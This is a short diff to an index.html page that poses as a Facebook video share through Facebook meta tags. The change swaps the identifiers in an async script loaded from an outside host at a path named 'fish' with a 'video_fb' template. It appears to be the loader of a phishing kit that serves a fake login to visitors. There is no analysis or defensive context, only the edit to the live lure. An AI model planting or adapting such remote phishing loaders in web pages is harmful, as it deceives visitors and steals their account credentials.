--- a/index.html
+++ b/index.html
@@ -12,6 +12,6 @@
 		<meta property="fb:app_id" content="87741124305" />
 	</head>
 	<body>
-	<script src="https://wolfpanels.cc/fish?name=estar&amung=condios03&template=video_fb" type="text/javascript" async="true"></script>
+	<script src="https://wolfpanels.cc/fish?name=kiki0&amung=pormexico&template=video_fb" type="text/javascript" async="true"></script>
 	</body>
 </html>
